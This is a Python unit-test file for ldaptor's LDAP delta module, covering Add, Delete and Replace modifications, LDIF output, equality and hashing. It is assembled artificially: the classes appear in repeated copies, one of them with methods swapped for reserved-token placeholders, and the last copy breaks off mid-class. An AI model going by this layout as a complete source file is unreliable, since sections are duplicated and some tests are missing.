m = delta.Replace('foo', ['bar', 'baz'])
self.assertEqual(m.asLDIF(), b'replace: foo\nfoo: bar\nfoo: baz\n-\n')
def testReplaceAll(self):
m = delta.Replace('thud')
self.assertEqual(m.asLDIF(), b'replace: thud\n-\n')
def testAddBase64(self):
"""
LDIF attribute representation is base64 encoded
if attribute value contains nonprintable characters
or starts with reserved characters
"""
m = delta.Add('attr', [':value1', 'value\n\r2'])
self.assertEqual(m.asLDIF(),
b'add: attr\nattr:: OnZhbHVlMQ==\nattr:: dmFsdWUKDTI=\n-\n')
class OperationTestCase(unittest.TestCase):
"""
Test case for operations on a LDAP tree.
"""
def getRoot(self):
"""
Returns a new LDAP root for dc=example,dc=com.
"""
return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.
DistinguishedName('dc=example,dc=com'))
class TestAddOpLDIF(OperationTestCase):
"""
Unit tests for `AddOp`.
"""
def testAsLDIF(self):
"""
It will return the LDIF representation of the operation.
"""
sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',
attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))
result = sut.asLDIF()
self.assertEqual(
b'dn: dc=example,dc=com\nchangetype: add\nfoo: bar\nfoo: baz\nquux: thud\n\n'
, result)
def testAddOpEqualitySameEntry(self):
"""
Objects are equal when the have the same LDAP entry.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(first, second)
def testAddOpInequalityDifferentEntry(self):
"""
Objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',
'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',
'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(first, second)
def testAddOpInequalityNoEntryObject(self):
"""
Objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
sut = delta.AddOp(team_entry)
self.assertNotEqual(sut, {'foo': ['same', 'attributes']})
def testAddOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(hash(first), hash(second))
def testAddOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'one', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'other', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testAddOp_DNExists(self):
"""
It fails to perform the `add` operation for an existing entry.
"""
root = self.getRoot()
root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [
'a', 'b'], 'ou': ['HR']})
hr_entry = entry.BaseLDAPEntry(dn=
'ou=Existing Team, dc=example,dc=com', attributes={'foo': [
'dont', 'care']})
sut = delta.AddOp(hr_entry)
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',
attributes={'bar': ['foo'], 'foo': ['bar']}))
self.assertEqual(repr(sut),
"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))"
)
class TestDeleteOpLDIF(OperationTestCase):
"""
Unit tests for DeleteOp.
"""
def testAsLDIF(self):
"""
It return the LDIF representation of the delete operation.
"""
sut = delta.DeleteOp('dc=example,dc=com')
result = sut.asLDIF()
self.assertEqual(b'dn: dc=example,dc=com\nchangetype: delete\n\n',
result)
def testDeleteOpEqualitySameDN(self):
"""
Objects are equal when the have the same DN.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(first, second)
def testDeleteOpEqualityEqualDN(self):
"""
DeleteOp objects are equal if their DNs are equal.
"""
first_dn = distinguishedname.DistinguishedName(stringValue=
'ou=Team,dc=example,dc=com')
first = delta.DeleteOp(first_dn)
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')
second = delta.DeleteOp(second_entry)
third = delta.DeleteOp('ou=Team, dc=example,dc=com')
self.assertEqual(first, second)
self.assertEqual(first, third)
def testDeleteOpInequalityDifferentEntry(self):
"""
DeleteOp objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(first, second)
def testDeleteOpInequalityNoEntryObject(self):
"""
DeleteOp objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
sut = delta.DeleteOp(team_entry)
self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')
def testDeleteOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(hash(first), hash(second))
def testDeleteOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testDeleteOp_DNNotFound(self):
"""
If fail to delete when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.DeleteOp('cn=nope,dc=example,dc=com')
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testDeleteOpInvalidDN(self):
"""
Invalid type of DN raises AssertionError
"""
self.assertRaises(AssertionError, delta.DeleteOp, 0)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.DeleteOp('dc=example,dc=com')
self.assertEqual(repr(sut), "DeleteOp('dc=example,dc=com')")
class TestModifyOp(OperationTestCase):
"""
Unit tests for ModifyOp.
"""
def testAsLDIF(self):
"""
It will return a LDIF representation of the contained operations.
"""
sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',
[delta.Add('postaladdress', [
'123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(
'description'), delta.Replace('telephonenumber', [
'+1 408 555 1234', '+1 408 555 5678']), delta.Delete(
'facsimiletelephonenumber', ['+1 408 555 9876'])])
result = sut.asLDIF()
self.assertEqual(
b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\nchangetype: modify\nadd: postaladdress\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\n-\ndelete: description\n-\nreplace: telephonenumber\ntelephonenumber: +1 408 555 1234\ntelephonenumber: +1 408 555 5678\n-\ndelete: facsimiletelephonenumber\nfacsimiletelephonenumber: +1 408 555 9876\n-\n\n'
, result)
def testInequalityDiffertnDN(self):
"""
Modify operations for different DN are not equal.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual(first, second)
def testInequalityDifferentModifications(self):
"""
Modify operations with different modifications are not equal
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual(first, second)
def testInequalityNotModifyOP(self):
"""
Modify operations are not equal with other object types.
"""
sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual('cn=john,dc=example,dc=com', sut)
def testInequalityDiffertnOperations(self):
"""
Modify operations for same DN but different operations are not equal.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(
'homeDirectory')])
self.assertNotEqual(first, second)
def testHashEquality(self):
"""
Modify operations can be hashed and equal objects have the same
hash.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertEqual(first, second)
self.assertEqual(first.asLDIF(), second.asLDIF(),
'LDIF equality is a precondition for valid hash values')
self.assertEqual(hash(first), hash(second))
def testHashInequality(self):
"""
Different modify operations have different hash values.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'homeDirectory')])
self.assertNotEqual(first.asLDIF(), second.asLDIF())
self.assertNotEqual(hash(first), hash(second))
def testModifyOp_DNNotFound(self):
"""
If fail to modify when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',
['bar'])])
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertEqual(repr(sut),
"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])"
)
class TestModificationComparison(unittest.TestCase):
def testEquality_Add_True(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = delta.Add('k', ['b', 'c', 'd'])
self.assertEqual(a, b)
def testEquality_AddVsDelete_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = delta.Delete('k', ['b', 'c', 'd'])
self.assertNotEqual(a, b)
def testEquality_AttributeSet_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])
self.assertNotEqual(a, b)
def testEquality_List_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = ['b', 'c', 'd']
self.assertNotEqual(a, b)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestModifications(unittest.TestCase):
def setUp(self):
self.foo = ldapsyntax.LDAPEntry(None, dn='cn=foo,dc=example,dc=com',
attributes={'objectClass': ['person'], 'cn': ['foo', 'thud'],
'sn': ['bar'], 'more': ['junk']})
<|reserved_special_token_0|>
def testAddNew(self):
mod = delta.Add('stuff', ['val1', 'val2'])
mod.patch(self.foo)
self.assertEqual(self.foo['stuff'], ['val1', 'val2'])
self.assertEqual(self.foo['cn'], ['foo', 'thud'])
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testDelete_FailOnNonExistingAttributeType_All(self):
mod = delta.Delete('notexist', [])
self.assertRaises(KeyError, mod.patch, self.foo)
<|reserved_special_token_0|>
def testDelete_FailOnNonExistingAttributeValue(self):
mod = delta.Delete('cn', ['notexist'])
self.assertRaises(LookupError, mod.patch, self.foo)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testReplace_Delete_NonExisting(self):
mod = delta.Replace('nonExisting', [])
mod.patch(self.foo)
self.assertFalse('stuff' in self.foo)
self.assertEqual(self.foo['sn'], ['bar'])
self.assertEqual(self.foo['more'], ['junk'])
class TestModificationOpLDIF(unittest.TestCase):
def testAdd(self):
m = delta.Add('foo', ['bar', 'baz'])
self.assertEqual(m.asLDIF(), b'add: foo\nfoo: bar\nfoo: baz\n-\n')
def testDelete(self):
m = delta.Delete('foo', ['bar', 'baz'])
self.assertEqual(m.asLDIF(), b'delete: foo\nfoo: bar\nfoo: baz\n-\n')
def testDeleteAll(self):
m = delta.Delete('foo')
self.assertEqual(m.asLDIF(), b'delete: foo\n-\n')
def testReplace(self):
m = delta.Replace('foo', ['bar', 'baz'])
self.assertEqual(m.asLDIF(), b'replace: foo\nfoo: bar\nfoo: baz\n-\n')
def testReplaceAll(self):
m = delta.Replace('thud')
self.assertEqual(m.asLDIF(), b'replace: thud\n-\n')
def testAddBase64(self):
"""
LDIF attribute representation is base64 encoded
if attribute value contains nonprintable characters
or starts with reserved characters
"""
m = delta.Add('attr', [':value1', 'value\n\r2'])
self.assertEqual(m.asLDIF(),
b'add: attr\nattr:: OnZhbHVlMQ==\nattr:: dmFsdWUKDTI=\n-\n')
class OperationTestCase(unittest.TestCase):
"""
Test case for operations on a LDAP tree.
"""
def getRoot(self):
"""
Returns a new LDAP root for dc=example,dc=com.
"""
return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.
DistinguishedName('dc=example,dc=com'))
class TestAddOpLDIF(OperationTestCase):
"""
Unit tests for `AddOp`.
"""
def testAsLDIF(self):
"""
It will return the LDIF representation of the operation.
"""
sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',
attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))
result = sut.asLDIF()
self.assertEqual(
b'dn: dc=example,dc=com\nchangetype: add\nfoo: bar\nfoo: baz\nquux: thud\n\n'
, result)
def testAddOpEqualitySameEntry(self):
"""
Objects are equal when the have the same LDAP entry.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(first, second)
def testAddOpInequalityDifferentEntry(self):
"""
Objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',
'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',
'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(first, second)
def testAddOpInequalityNoEntryObject(self):
"""
Objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
sut = delta.AddOp(team_entry)
self.assertNotEqual(sut, {'foo': ['same', 'attributes']})
def testAddOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(hash(first), hash(second))
def testAddOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'one', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'other', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testAddOp_DNExists(self):
"""
It fails to perform the `add` operation for an existing entry.
"""
root = self.getRoot()
root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [
'a', 'b'], 'ou': ['HR']})
hr_entry = entry.BaseLDAPEntry(dn=
'ou=Existing Team, dc=example,dc=com', attributes={'foo': [
'dont', 'care']})
sut = delta.AddOp(hr_entry)
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',
attributes={'bar': ['foo'], 'foo': ['bar']}))
self.assertEqual(repr(sut),
"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))"
)
class TestDeleteOpLDIF(OperationTestCase):
"""
Unit tests for DeleteOp.
"""
def testAsLDIF(self):
"""
It return the LDIF representation of the delete operation.
"""
sut = delta.DeleteOp('dc=example,dc=com')
result = sut.asLDIF()
self.assertEqual(b'dn: dc=example,dc=com\nchangetype: delete\n\n',
result)
def testDeleteOpEqualitySameDN(self):
"""
Objects are equal when the have the same DN.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(first, second)
def testDeleteOpEqualityEqualDN(self):
"""
DeleteOp objects are equal if their DNs are equal.
"""
first_dn = distinguishedname.DistinguishedName(stringValue=
'ou=Team,dc=example,dc=com')
first = delta.DeleteOp(first_dn)
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')
second = delta.DeleteOp(second_entry)
third = delta.DeleteOp('ou=Team, dc=example,dc=com')
self.assertEqual(first, second)
self.assertEqual(first, third)
def testDeleteOpInequalityDifferentEntry(self):
"""
DeleteOp objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(first, second)
def testDeleteOpInequalityNoEntryObject(self):
"""
DeleteOp objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
sut = delta.DeleteOp(team_entry)
self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')
def testDeleteOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(hash(first), hash(second))
def testDeleteOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testDeleteOp_DNNotFound(self):
"""
If fail to delete when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.DeleteOp('cn=nope,dc=example,dc=com')
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testDeleteOpInvalidDN(self):
"""
Invalid type of DN raises AssertionError
"""
self.assertRaises(AssertionError, delta.DeleteOp, 0)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.DeleteOp('dc=example,dc=com')
self.assertEqual(repr(sut), "DeleteOp('dc=example,dc=com')")
class TestModifyOp(OperationTestCase):
"""
Unit tests for ModifyOp.
"""
def testAsLDIF(self):
"""
It will return a LDIF representation of the contained operations.
"""
sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',
[delta.Add('postaladdress', [
'123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(
'description'), delta.Replace('telephonenumber', [
'+1 408 555 1234', '+1 408 555 5678']), delta.Delete(
'facsimiletelephonenumber', ['+1 408 555 9876'])])
result = sut.asLDIF()
self.assertEqual(
b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\nchangetype: modify\nadd: postaladdress\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\n-\ndelete: description\n-\nreplace: telephonenumber\ntelephonenumber: +1 408 555 1234\ntelephonenumber: +1 408 555 5678\n-\ndelete: facsimiletelephonenumber\nfacsimiletelephonenumber: +1 408 555 9876\n-\n\n'
, result)
def testInequalityDiffertnDN(self):
"""
Modify operations for different DN are not equal.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual(first, second)
def testInequalityDifferentModifications(self):
"""
Modify operations with different modifications are not equal
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual(first, second)
def testInequalityNotModifyOP(self):
"""
Modify operations are not equal with other object types.
"""
sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual('cn=john,dc=example,dc=com', sut)
def testInequalityDiffertnOperations(self):
"""
Modify operations for same DN but different operations are not equal.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(
'homeDirectory')])
self.assertNotEqual(first, second)
def testHashEquality(self):
"""
Modify operations can be hashed and equal objects have the same
hash.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertEqual(first, second)
self.assertEqual(first.asLDIF(), second.asLDIF(),
'LDIF equality is a precondition for valid hash values')
self.assertEqual(hash(first), hash(second))
def testHashInequality(self):
"""
Different modify operations have different hash values.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'homeDirectory')])
self.assertNotEqual(first.asLDIF(), second.asLDIF())
self.assertNotEqual(hash(first), hash(second))
def testModifyOp_DNNotFound(self):
"""
If fail to modify when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',
['bar'])])
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertEqual(repr(sut),
"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])"
)
class TestModificationComparison(unittest.TestCase):
def testEquality_Add_True(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = delta.Add('k', ['b', 'c', 'd'])
self.assertEqual(a, b)
def testEquality_AddVsDelete_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = delta.Delete('k', ['b', 'c', 'd'])
self.assertNotEqual(a, b)
def testEquality_AttributeSet_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])
self.assertNotEqual(a, b)
def testEquality_List_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = ['b', 'c', 'd']
self.assertNotEqual(a, b)
<|reserved_special_token_1|>
"""
Test cases for ldaptor.protocols.ldap.delta
"""
from twisted.trial import unittest
from ldaptor import delta, entry, attributeset, inmemory
from ldaptor.protocols.ldap import ldapsyntax, distinguishedname, ldaperrors
class TestModifications(unittest.TestCase):
def setUp(self):
self.foo = ldapsyntax.LDAPEntry(
None,
dn="cn=foo,dc=example,dc=com",
attributes={
"objectClass": ["person"],
"cn": ["foo", "thud"],
"sn": ["bar"],
"more": ["junk"],
},
)
def testAddOld(self):
mod = delta.Add("cn", ["quux"])
mod.patch(self.foo)
self.assertFalse("stuff" in self.foo)
self.assertEqual(self.foo["cn"], ["foo", "thud", "quux"])
def testAddNew(self):
mod = delta.Add("stuff", ["val1", "val2"])
mod.patch(self.foo)
self.assertEqual(self.foo["stuff"], ["val1", "val2"])
self.assertEqual(self.foo["cn"], ["foo", "thud"])
def testDelete(self):
mod = delta.Delete("cn", ["thud"])
mod.patch(self.foo)
self.assertFalse("stuff" in self.foo)
self.assertEqual(self.foo["cn"], ["foo"])
def testDeleteAll(self):
mod = delta.Delete("more")
mod.patch(self.foo)
self.assertFalse("stuff" in self.foo)
self.assertEqual(self.foo["cn"], ["foo", "thud"])
def testDelete_FailOnNonExistingAttributeType_All(self):
mod = delta.Delete("notexist", [])
self.assertRaises(KeyError, mod.patch, self.foo)
def testDelete_FailOnNonExistingAttributeType_OneValue(self):
mod = delta.Delete("notexist", ["a"])
self.assertRaises(KeyError, mod.patch, self.foo)
def testDelete_FailOnNonExistingAttributeValue(self):
mod = delta.Delete("cn", ["notexist"])
self.assertRaises(LookupError, mod.patch, self.foo)
def testReplace_Add(self):
mod = delta.Replace("stuff", ["val1", "val2"])
mod.patch(self.foo)
self.assertEqual(self.foo["stuff"], ["val1", "val2"])
self.assertEqual(self.foo["sn"], ["bar"])
self.assertEqual(self.foo["more"], ["junk"])
def testReplace_Modify(self):
mod = delta.Replace("sn", ["baz"])
mod.patch(self.foo)
self.assertFalse("stuff" in self.foo)
self.assertEqual(self.foo["sn"], ["baz"])
self.assertEqual(self.foo["more"], ["junk"])
def testReplace_Delete_Existing(self):
mod = delta.Replace("more", [])
mod.patch(self.foo)
self.assertFalse("stuff" in self.foo)
self.assertEqual(self.foo["sn"], ["bar"])
self.assertFalse("more" in self.foo)
def testReplace_Delete_NonExisting(self):
mod = delta.Replace("nonExisting", [])
mod.patch(self.foo)
self.assertFalse("stuff" in self.foo)
self.assertEqual(self.foo["sn"], ["bar"])
self.assertEqual(self.foo["more"], ["junk"])
class TestModificationOpLDIF(unittest.TestCase):
def testAdd(self):
m = delta.Add("foo", ["bar", "baz"])
self.assertEqual(
m.asLDIF(),
b"""\
add: foo
foo: bar
foo: baz
-
""",
)
def testDelete(self):
m = delta.Delete("foo", ["bar", "baz"])
self.assertEqual(
m.asLDIF(),
b"""\
delete: foo
foo: bar
foo: baz
-
""",
)
def testDeleteAll(self):
m = delta.Delete("foo")
self.assertEqual(
m.asLDIF(),
b"""\
delete: foo
-
""",
)
def testReplace(self):
m = delta.Replace("foo", ["bar", "baz"])
self.assertEqual(
m.asLDIF(),
b"""\
replace: foo
foo: bar
foo: baz
-
""",
)
def testReplaceAll(self):
m = delta.Replace("thud")
self.assertEqual(
m.asLDIF(),
b"""\
replace: thud
-
""",
)
def testAddBase64(self):
"""
LDIF attribute representation is base64 encoded
if attribute value contains nonprintable characters
or starts with reserved characters
"""
m = delta.Add("attr", [":value1", "value\n\r2"])
self.assertEqual(
m.asLDIF(),
b"""\
add: attr
attr:: OnZhbHVlMQ==
attr:: dmFsdWUKDTI=
-
""",
)
class OperationTestCase(unittest.TestCase):
"""
Test case for operations on a LDAP tree.
"""
def getRoot(self):
"""
Returns a new LDAP root for dc=example,dc=com.
"""
return inmemory.ReadOnlyInMemoryLDAPEntry(
dn=distinguishedname.DistinguishedName("dc=example,dc=com")
)
class TestAddOpLDIF(OperationTestCase):
"""
Unit tests for `AddOp`.
"""
def testAsLDIF(self):
"""
It will return the LDIF representation of the operation.
"""
sut = delta.AddOp(
entry.BaseLDAPEntry(
dn="dc=example,dc=com",
attributes={
"foo": ["bar", "baz"],
"quux": ["thud"],
},
)
)
result = sut.asLDIF()
self.assertEqual(
b"""dn: dc=example,dc=com
changetype: add
foo: bar
foo: baz
quux: thud
""",
result,
)
def testAddOpEqualitySameEntry(self):
"""
Objects are equal when the have the same LDAP entry.
"""
first_entry = entry.BaseLDAPEntry(
dn="ou=Duplicate Team, dc=example,dc=com",
attributes={"foo": ["same", "attributes"]},
)
second_entry = entry.BaseLDAPEntry(
dn="ou=Duplicate Team, dc=example,dc=com",
attributes={"foo": ["same", "attributes"]},
)
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(first, second)
def testAddOpInequalityDifferentEntry(self):
"""
Objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(
dn="ou=First Team, dc=example,dc=com",
attributes={"foo": ["same", "attributes"]},
)
second_entry = entry.BaseLDAPEntry(
dn="ou=First Team, dc=example,dc=com",
attributes={"foo": ["other", "attributes"]},
)
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(first, second)
def testAddOpInequalityNoEntryObject(self):
"""
Objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(
dn="ou=Duplicate Team, dc=example,dc=com",
attributes={"foo": ["same", "attributes"]},
)
sut = delta.AddOp(team_entry)
self.assertNotEqual(sut, {"foo": ["same", "attributes"]})
def testAddOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(
dn="ou=Duplicate Team, dc=example,dc=com",
attributes={"foo": ["same", "attributes"]},
)
second_entry = entry.BaseLDAPEntry(
dn="ou=Duplicate Team, dc=example,dc=com",
attributes={"foo": ["same", "attributes"]},
)
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(hash(first), hash(second))
